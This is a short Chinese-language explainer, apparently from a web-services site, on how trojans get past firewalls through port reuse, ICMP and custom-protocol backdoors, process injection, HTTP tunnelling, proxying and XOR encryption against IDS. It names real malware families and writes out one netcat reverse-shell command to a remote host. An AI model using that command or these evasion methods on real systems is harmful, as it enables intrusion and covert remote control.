網(wǎng)站建設(shè)資深技術(shù)為您分析：您電腦中的木馬是如何穿過防火墻的：
　　1. 首先就是No Firewall(允許本地對外監(jiān)聽基本上任何端口),沒有防火墻?對付這種機器好辦,隨便哪個馬一般都行典型代表 Radmin，rdp 3389/tcp
　　2. 端口篩選：
　　使用工具netcat就可以穿刺這種防火墻:nc -e cmd.exe 遠程ip，遠程監(jiān)聽port；隨后,端口復(fù)用技術(shù)也出現(xiàn)了,復(fù)用防火墻開放的端口:如80,21,445等...典型的后門如hkdoor,ntrookit；還有利用無端口協(xié)議來通信,如利用icmp報文,典型的如pingdoor，Ping由于使用icmp報文,根本不開放端口,端口篩選也就無可奈何了,但是icmp并無差錯控制,所以這種后門的傳輸特性也并不理想,除非自己加上差錯控制；更牛的,就是干脆拋開TCP/IP協(xié)議,木馬自定義協(xié)議進行通信,你防火墻能把我怎么樣?典型的如ntrootkit采用了自定義協(xié)議技術(shù).
　　3.應(yīng)用程序篩選.
　　進程插入技術(shù)誕生了,通常firewall都要允許iexplore.exe,explore.exe,svchost.exe,services.exe等程序訪問網(wǎng)絡(luò),于是木馬便盯上了這些程序.插入...插入再插入。現(xiàn)在的遠程控制一般都是插入進程式,一是隱蔽(沒有自己進程),二是穿墻.典型如Bits.dll(替換系統(tǒng)服務(wù)BITS,插入svchost.exe中)和灰鴿子/PcShare(默認插入iexplorer.exe瀏覽器進程)等.
　　4.協(xié)議篩選.
　　挖隧道: http-tunnel (http隧道)將木馬通信封裝成http數(shù)據(jù)報進行傳輸.使用這種技術(shù)的有pcshare(使用雙向http隧道傳輸)
　　5.IP過濾,一般就是化分為本機,局域網(wǎng),廣域網(wǎng)三個層次,不過木馬也不是吃素的,有些木馬已經(jīng)開始智能化了:
　　比如,無法連到黑客主機或者跳板,就搜索本機的代理設(shè)置,如IE代理設(shè)置,然后代理出去!可以想象P2P形式的馬也將于不久以后成為可能,這樣木馬和僵尸網(wǎng)絡(luò)的區(qū)別就更小了 呵呵
　　6. 現(xiàn)在很多防火墻都可以檢測傳輸?shù)拿舾行畔?如用戶口令等,所以抗IDS,抗自動分析,這便成了高級木馬需要考慮的東西,換句話說保護黑客控制的安全性和隱秘性.典型的解決方法就是采取加密措施,如最簡單的對付IDS檢測的方法,xor異或加密.
　　但是現(xiàn)在的防護墻肯定不是以上技術(shù)的分離,而是一定有多項技術(shù)同時采用.